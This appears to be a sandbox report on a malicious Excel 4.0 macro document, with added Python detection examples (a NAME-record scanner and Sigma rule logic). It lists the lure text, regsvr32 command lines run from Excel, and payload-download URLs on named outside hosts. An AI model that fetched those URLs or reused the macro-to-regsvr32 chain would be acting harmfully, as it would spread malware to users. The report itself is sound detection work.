
Windows Analysis Report doc-220808714.xls

Overview

General Information

Sample Name:doc-220808714.xls
Analysis ID:501226
MD5:2654fdca7197f542cbd0be823a2a2a9f
SHA1:149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
SHA256:f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5028 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5252 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4440 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3328 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: doc-220808714.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x384aa:$s1: Excel
  • 0x39557:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: doc-220808714.xls | Rule: JoeSecurity_HiddenMacro | Description: Yara detected hidden Macro 4.0 in Excel | Author: Joe Security
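The $Auto_Open string above is a BIFF NAME (Lbl) record: record type 0x0018, body length 0x17, grbit 0x0020 (fBuiltin), a one-character name whose built-in index 0x01 means Auto_Open, followed by a formula that starts with ptgRef3d (0x3A). The following scanner is an added example, not code from Joe Sandbox or from the rule's author; it decodes those fields per the MS-XLS Lbl layout instead of matching the fixed byte pattern, so it also reports the hidden variant (grbit 0x0021) that the JoeSecurity_HiddenMacro verdict refers to, and Auto_Close (index 0x02). The sample bytes are constructed here and are not the analysed document.

```python
import re
import struct

# BIFF record type of a defined name (the Lbl / NAME record in MS-XLS).
BIFF_NAME = 0x0018
BIFF_MAX_RECORD = 0x2020          # largest legal BIFF8 record body
F_HIDDEN = 0x0001                 # Lbl.fHidden: name is not shown in the Name Manager
F_BUILTIN = 0x0020                # Lbl.fBuiltin: Name is a one-byte built-in index
# Built-in name indices that Excel evaluates without user interaction.
AUTO_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close"}
OLE_MAGIC = b"\xD0\xCF\x11\xE0"
# Fixed-size part of the Lbl body: grbit, chKey, cch, cce, ixals, itab,
# cchCustMenu, cchDescription, cchHelptopic, cchStatustext.
LBL_HEAD = struct.Struct("<HBBHHHBBBB")


def find_auto_names(data: bytes) -> list[dict]:
    """Return every NAME record whose built-in name is Auto_Open or Auto_Close.

    Field-based rather than the fixed byte pattern of $Auto_Open, so a hidden
    name (grbit 0x0021) or a Unicode name string is reported as well.
    """
    hits = []
    for m in re.finditer(rb"\x18\x00", data):
        off = m.start()
        if off + 4 > len(data):
            break
        _rt, cb = struct.unpack_from("<HH", data, off)
        body = data[off + 4:off + 4 + cb]
        if cb > BIFF_MAX_RECORD or len(body) < LBL_HEAD.size + 2:
            continue
        grbit, _chkey, cch, cce, *_rest = LBL_HEAD.unpack_from(body)
        if not grbit & F_BUILTIN or cch != 1:
            continue
        # XLUnicodeStringNoCch: one flag byte (bit 0 = fHighByte), then cch characters.
        char_width = 2 if body[LBL_HEAD.size] & 0x01 else 1
        name_idx = body[LBL_HEAD.size + 1]          # low byte carries the built-in index
        if name_idx not in AUTO_NAMES:
            continue
        formula_off = LBL_HEAD.size + 1 + cch * char_width
        hits.append({
            "offset": off,
            "name": AUTO_NAMES[name_idx],
            "hidden": bool(grbit & F_HIDDEN),
            "formula": body[formula_off:formula_off + cce],   # rgce, cce bytes of ptgs
        })
    return hits


def triage(data: bytes) -> dict:
    """Combine the same three conditions the Yara rule uses: OLE header,
    the literal 'Excel', and an auto-executing built-in name."""
    names = find_auto_names(data)
    return {
        "ole_header": data[:4] == OLE_MAGIC,
        "excel_string": b"Excel" in data,
        "auto_names": names,
        "suspicious": data[:4] == OLE_MAGIC and b"Excel" in data and bool(names),
    }


# Constructed sample (not the real file): an OLE header, filler, the 21 bytes
# reported for $Auto_Open plus the six remaining bytes of the ptgRef3d formula,
# and a second NAME record that is both built-in and hidden (grbit 0x0021).
AUTO_OPEN_RECORD = bytes.fromhex(
    "18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00 00 00 00 01 00"
)
HIDDEN_AUTO_OPEN_RECORD = AUTO_OPEN_RECORD[:4] + b"\x21\x00" + AUTO_OPEN_RECORD[6:]
SAMPLE = (OLE_MAGIC + b"\x00" * 28 + b"Microsoft Excel" + b"\x00" * 8
          + AUTO_OPEN_RECORD + b"\x00" * 8 + HIDDEN_AUTO_OPEN_RECORD + b"\x00" * 8)

if __name__ == "__main__":
    for hit in find_auto_names(SAMPLE):
        print(f"{hit['offset']:#06x} {hit['name']:<10} hidden={hit['hidden']} "
              f"formula={hit['formula'].hex()}")
    print("suspicious:", triage(SAMPLE)["suspicious"])
```

Like the Yara rule, this scans the raw container bytes rather than the parsed Workbook stream, which is what makes it cheap to run at scale but also means a NAME record split across two non-adjacent CFB sectors in a fragmented file is missed; for a definitive answer, extract the Workbook stream with an OLE parser first and run the same record walk over it.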

    Sigma Overview

    System Summary:

    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started | Author: Florian Roth
    Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 5252
    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
    Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 5252
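Both Sigma hits come from one process-creation event: EXCEL.EXE (a 32-bit build under Program Files (x86)) starts regsvr32.exe with a payload whose extension is not .dll, and the command line names System32 while the Image is SysWOW64 because WOW64 file-system redirection rewrites the path for 32-bit callers. The code below is an added example, not Joe Sandbox's or the Sigma project's own matcher; it re-implements the two rules' logic over the event fields shown in the report. The Office parent set and the child list are assumptions approximating the public rules, the first three events are transcribed from the process tree above, and the fourth is a constructed benign registration.

```python
import ntpath
import re

# Parent images keyed on by "Microsoft Office Product Spawning Windows Shell".
# Both sets are assumed subsets of what the public Sigma rules enumerate.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe", "visio.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
                  "bitsadmin.exe", "msiexec.exe", "schtasks.exe", "wmic.exe"}

# First token of a Windows command line (quoted with ' or ", or bare), then the rest.
CMD_RE = re.compile(r"""^\s*("[^"]*"|'[^']*'|\S+)\s*(.*)$""", re.S)


def split_cmdline(cmdline: str) -> tuple[str, str]:
    m = CMD_RE.match(cmdline)
    if not m:
        return cmdline, ""
    return m.group(1).strip("'\""), m.group(2).strip()


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_regsvr32_without_dll(ev: dict) -> bool:
    """Regsvr32 Command Line Without DLL: regsvr32 given arguments that never mention .dll."""
    if image_name(ev["Image"]) != "regsvr32.exe":
        return False
    _exe, args = split_cmdline(ev["CommandLine"])
    return bool(args) and ".dll" not in args.lower()


def rule_office_spawns_shell(ev: dict) -> bool:
    """Microsoft Office Product Spawning Windows Shell: Office parent, scripting/LOLBin child."""
    return (image_name(ev["ParentImage"]) in OFFICE_PARENTS
            and image_name(ev["Image"]) in SHELL_CHILDREN)


RULES = {
    "Regsvr32 Command Line Without DLL": rule_regsvr32_without_dll,
    "Microsoft Office Product Spawning Windows Shell": rule_office_spawns_shell,
}


def evaluate(ev: dict) -> list[str]:
    return [name for name, rule in RULES.items() if rule(ev)]


OFFICE = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"
# First three events transcribed from the report's process tree; the fourth is
# a constructed benign DLL registration by the Windows Installer service.
EVENTS = [
    {"ProcessId": 5252, "ParentProcessId": 5028, "ParentImage": OFFICE,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test"},
    {"ProcessId": 4440, "ParentProcessId": 5028, "ParentImage": OFFICE,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test"},
    {"ProcessId": 3328, "ParentProcessId": 5028, "ParentImage": OFFICE,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test"},
    {"ProcessId": 7010, "ParentProcessId": 7002,
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
]


def run(events=EVENTS) -> dict[int, list[str]]:
    """Map each ProcessId to the rule names it triggers."""
    return {ev["ProcessId"]: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for pid, matched in run().items():
        print(pid, matched or "-")
```

The ".dll" test is a substring check, which is what makes the rule cheap and also what bounds it: a payload named anything containing ".dll" would not trigger it, so the Office-parent rule is the one to rely on, and the three regsvr32 children here trip both.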

    Jbx Signature Overview


    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: doc-220808714.xls | Virustotal: Detection: 13%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknown | HTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.5:49745 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.5:49756 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.5:49761 version: TLS 1.2

    Software Vulnerabilities:

    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
    Source: global traffic | TCP traffic: 192.168.2.5:49745 -> 172.93.99.178:443
    Source: global traffic | DNS query: name: ohemaa.org
    Source: global traffic | HTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ohemaa.org | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: madieandme.com.au | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: amerident.com.do | Connection: Keep-Alive
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox View | IP Address: 172.93.99.178
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.dr | Strings found in binary or memory:
      • http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      • http://weather.service.msn.com/data.aspx
      • https://addinsinstallation.store.office.com/app/acquisitionlogging
      • https://addinsinstallation.store.office.com/app/download
      • https://addinsinstallation.store.office.com/appinstall/preinstalled
      • https://addinsinstallation.store.office.com/appinstall/unauthenticated
      • https://addinslicensing.store.office.com/commerce/query
      • https://addinslicensing.store.office.com/entitlement/query
      • https://analysis.windows.net/powerbi/api
      • https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      • https://api.aadrm.com
      • https://api.aadrm.com/
      • https://api.addins.omex.office.net/appinfo/query
      • https://api.addins.omex.office.net/appstate/query
      • https://api.addins.store.office.com/app/query
      • https://api.cortana.ai
      • https://api.diagnostics.office.com
      • https://api.diagnosticssdf.office.com
      • https://api.microsoftstream.com/api/
      • https://api.office.net
      • https://api.onedrive.com
      • https://api.powerbi.com/beta/myorg/imports
      • https://api.powerbi.com/v1.0/myorg/datasets
      • https://api.powerbi.com/v1.0/myorg/groups
      • https://apis.live.net/v5.0/
      • https://arc.msn.com/v4/api/selection
      • https://asgsmsproxyapi.azurewebsites.net/
      • https://augloop.office.com
      • https://augloop.office.com/v2
      • https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      • https://autodiscover-s.outlook.com/
      • https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      • https://cdn.entity.
      • https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      • https://client-office365-tas.msedge.net/ab
      • https://clients.config.office.net/
      • https://clients.config.office.net/user/v1.0/android/policies
      • https://clients.config.office.net/user/v1.0/ios
      • https://clients.config.office.net/user/v1.0/mac
      • https://clients.config.office.net/user/v1.0/tenantassociationkey
      • https://cloudfiles.onenote.com/upload.aspx
      • https://config.edge.skype.com
      • https://config.edge.skype.com/config/v1/Office
      • https://config.edge.skype.com/config/v2/Office
      • https://cortana.ai
      • https://cortana.ai/api
      • https://cr.office.com
      • https://dataservice.o365filtering.com
      • https://dataservice.o365filtering.com/
      • https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      • https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      • https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      • https://dev.cortana.ai
      • https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      • https://dev0-api.acompli.net/autodetect
      • https://devnull.onenote.com
      • https://directory.services.
      • https://ecs.office.com/config/v2/Office
      • https://enrichment.osi.office.net/
      • https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      • https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      • https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      • https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      • https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      • https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      • https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      • https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      • https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      • https://entitlement.diagnostics.office.com
      • https://entitlement.diagnosticssdf.office.com
      • https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      • https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      • https://globaldisco.crm.dynamics.com
      • https://graph.ppe.windows.net
      • https://graph.ppe.windows.net/
      • https://graph.windows.net
      • https://graph.windows.net/
      • https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      • https://hubblecontent.osi.office.net/contentsvc/browse?
      • https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      • https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      • https://incidents.diagnostics.office.com
      • https://incidents.diagnosticssdf.office.com
      • https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      • https://insertmedia.bing.office.net/odc/insertmedia
      • https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      • https://lifecycle.office.com
      • https://login.microsoftonline.com/
      • https://login.windows-ppe.net/common/oauth2/authorize
      • https://login.windows.local
      • https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      • https://login.windows.net/common/oauth2/authorize
      • https://loki.delve.office.com/api/v1/configuration/officewin32/
      • https://lookup.onenote.com/lookup/geolocation/v1
      • https://management.azure.com
      • https://management.azure.com/
      • https://messaging.office.com/
      • https://metadata.templates.cdn.office.net/client/log
      • https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      • https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      • https://ncus.contentsync.
      • https://ncus.pagecontentsync.
      • https://o365auditrealtimeingestion.manage.office.com
      • https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      • https://o365diagnosticsppe-web.cloudapp.net
      • https://ocos-office365-s2s.msedge.net/ab
      • https://ofcrecsvcapi-int.azurewebsites.net/
      • https://officeapps.live.com
      • https://officeci.azurewebsites.net/api/
      • https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      • https://officesetup.getmicrosoftkey.com
      • https://ogma.osi.office.net/TradukoApi/api/v1.0/
      • https://omex.cdn.office.net/addinclassifier/officeentities
      • https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      • https://omex.cdn.office.net/addinclassifier/officesharedentities
      • https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      • https://onedrive.live.com
      • https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      • https://onedrive.live.com/embed?
      • https://osi.office.net
      • https://outlook.office.com
      • https://outlook.office.com/
      • https://outlook.office.com/autosuggest/api/v1/init?cvid=
      • https://outlook.office365.com
      • https://outlook.office365.com/
      • https://outlook.office365.com/api/v1.0/me/Activities
      • https://outlook.office365.com/autodiscover/autodiscover.json
      • https://ovisualuiapp.azurewebsites.net/pbiagave/
      • https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      • https://pages.store.office.com/review/query
      • https://pages.store.office.com/webapplandingpage.aspx
      • https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      • https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      • https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      • https://portal.office.com/account/?ref=ClientMeControl
      • https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      • https://powerlift-frontdesk.acompli.net
      • https://powerlift.acompli.net
      • https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      • https://prod-global-autodetect.acompli.net/autodetect
      • https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      • https://res.getmicrosoftkey.com/api/redemptionevents
      • https://roaming.edog.
      • https://rpsticket.partnerservices.getmicrosoftkey.com
      • https://settings.outlook.com
      • https://shell.suite.office.com:1443
      • https://skyapi.live.net/Activity/
      • https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      • https://staging.cortana.ai
      • https://storage.live.com/clientlogs/uploadlocation
      • https://store.office.cn/addinstemplate
      • https://store.office.com/addinstemplate
      • https://store.office.de/addinstemplate
      • https://store.officeppe.com/addinstemplate
      • https://substrate.office.com/search/api/v1/SearchHistory
      • https://substrate.office.com/search/api/v2/init
      • https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      • https://tasks.office.com
      • https://uci.cdn.office.net/mirrored/smartlookup/current/
      • https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      • https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      • https://visio.uservoice.com/forums/368202-visio-on-devices
      • https://web.microsoftstream.com/video/
      • https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      • https://webshell.suite.office.com
      • https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      • https://wus2.contentsync.
      • https://wus2.pagecontentsync.
      • https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      • https://www.odwebp.svc.ms
    Source: unknown | DNS traffic detected: queries for: ohemaa.org

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0 | Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1 | Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: doc-220808714.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
    Source: doc-220808714.xls | OLE indicator, VBA macros: true
    Source: doc-220808714.xls | Virustotal: Detection: 13%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: doc-220808714.xls | OLE indicator, Workbook stream: true
    Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{25FE220D-AF93-41AA-9976-6A196A4AA241} - OProcSessId.dat
    Source: classification engine | Classification label: mal76.expl.winXLS@7/1@3/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\regsvr32.exe | Automated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exe | Automated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exe | Automated click: OK
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
